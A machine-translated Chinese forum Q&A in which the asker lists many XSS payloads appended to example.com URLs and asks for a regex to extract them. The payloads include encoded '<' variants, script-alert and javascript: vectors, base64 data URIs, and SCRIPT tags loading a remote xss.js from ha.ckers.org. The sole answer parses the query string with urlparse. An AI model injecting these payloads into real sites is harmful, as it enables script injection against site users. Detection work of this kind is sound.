正则表达式匹配以下lis中的所有XSS有效负载

2024-05-23 22:35:55 发布

您现在位置:Python中文网/ 问答频道 /正文
1380 3

我需要一个正则表达式,它将匹配以下列表中的所有XSS有效负载(我不是试图过滤XSS请求并将URL保存为安全的,而是尝试从URL本身提取有效负载并将其保存到一个变量中以供以后使用):

http://www.example.com/subcat.php?id=24\x3c
http://www.example.com/subcat.php?id=24\x3C
http://www.example.com/subcat.php?id=24\u003c
http://www.example.com/subcat.php?id=24\u003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24%3C
http://www.example.com/subcat.php?id=24&lt
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&LT
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#60
http://www.example.com/subcat.php?id=24&#060
http://www.example.com/subcat.php?id=24&#0060
http://www.example.com/subcat.php?id=24&#00060
http://www.example.com/subcat.php?id=24&#000060
http://www.example.com/subcat.php?id=24&#0000060
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#x3c
http://www.example.com/subcat.php?id=24&#x03c
http://www.example.com/subcat.php?id=24&#x003c
http://www.example.com/subcat.php?id=24&#x0003c
http://www.example.com/subcat.php?id=24&#x00003c
http://www.example.com/subcat.php?id=24&#x000003c
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#X3c
http://www.example.com/subcat.php?id=24&#X03c
http://www.example.com/subcat.php?id=24&#X003c
http://www.example.com/subcat.php?id=24&#X0003c
http://www.example.com/subcat.php?id=24&#X00003c
http://www.example.com/subcat.php?id=24&#X000003c
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#x3C
http://www.example.com/subcat.php?id=24&#x03C
http://www.example.com/subcat.php?id=24&#x003C
http://www.example.com/subcat.php?id=24&#x0003C
http://www.example.com/subcat.php?id=24&#x00003C
http://www.example.com/subcat.php?id=24&#x000003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24&#X3C
http://www.example.com/subcat.php?id=24&#X03C
http://www.example.com/subcat.php?id=24&#X003C
http://www.example.com/subcat.php?id=24&#X0003C
http://www.example.com/subcat.php?id=24&#X00003C
http://www.example.com/subcat.php?id=24&#X000003C
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<
http://www.example.com/subcat.php?id=24<script>alert(123)</script>
http://www.example.com/subcat.php?id=24<script>alert("hellox worldss");</script>
http://www.example.com/subcat.php?id=24javascript:alert("hellox worldss")
http://www.example.com/subcat.php?id=24<img src="javascript:alert('XSS');">
http://www.example.com/subcat.php?id=24<img src=javascript:alert(&quot;XSS&quot;)>
http://www.example.com/subcat.php?id=24<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
http://www.example.com/subcat.php?id=24<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
http://www.example.com/subcat.php?id=24<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
http://www.example.com/subcat.php?id=24<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.example.com/subcat.php?id=24<<SCRIPT>alert("XSS");//<</SCRIPT>
.... (for all see the URL)

我确实找到了一个,并对其进行了编辑,使之与部分匹配,但并非全部匹配:

^{pr2}$

例如,请参见here,它将只匹配具有<script>的对象,而其中一些不会对它们进行完全匹配。有没有更好的regex只匹配URL的XSS负载,或者找到XSS负载的更好方法?提前谢谢你。在


Tags: srccomidhttpstringexamplewwwscript
1条回答
网友
1楼 · 发布于 2024-05-23 22:35:55

找到了一个简单地使用内置库来实现这一点的方法:

import urlparse

def find_xss_script(url, query=4):
    data = urlparse.urlparse(url)
    return data[query]

将返回如下内容:id=24&#x000003c;

相关问题 更多 >

    编程相关推荐